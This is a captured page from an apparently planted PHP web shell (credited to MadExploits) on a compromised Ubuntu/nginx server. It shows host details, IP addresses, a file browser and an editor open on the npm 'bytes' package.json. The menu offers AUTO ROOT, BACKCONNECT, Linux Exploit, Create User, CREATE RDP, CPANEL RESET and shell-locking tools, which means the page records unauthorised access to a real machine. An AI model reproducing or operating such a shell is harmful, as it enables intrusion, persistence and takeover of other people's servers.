Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
bytes /
[ HOME SHELL ]
Name
Size
Permission
Action
History.md
1.47
KB
-rw-r--r--
LICENSE
1.13
KB
-rw-r--r--
Readme.md
3.8
KB
-rw-r--r--
index.js
3.31
KB
-rw-r--r--
package.json
998
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "bytes", "description": "Utility to parse a string bytes to bytes and vice-versa", "version": "3.0.0", "author": "TJ Holowaychuk <tj@vision-media.ca> (http://tjholowaychuk.com)", "contributors": [ "Jed Watson <jed.watson@me.com>", "Théo FIDRY <theo.fidry@gmail.com>" ], "license": "MIT", "keywords": [ "byte", "bytes", "utility", "parse", "parser", "convert", "converter" ], "repository": "visionmedia/bytes.js", "devDependencies": { "mocha": "2.5.3", "nyc": "10.3.2" }, "files": [ "History.md", "LICENSE", "Readme.md", "index.js" ], "engines": { "node": ">= 0.8" }, "scripts": { "test": "mocha --check-leaks --reporter spec", "test-ci": "nyc --reporter=text npm test", "test-cov": "nyc --reporter=html --reporter=text npm test" } ,"_resolved": "https://registry.npmjs.org/bytes/-/bytes-3.0.0.tgz" ,"_integrity": "sha1-0ygVQE1olpn4Wk6k+odV3ROpYEg=" ,"_from": "bytes@3.0.0" }
Close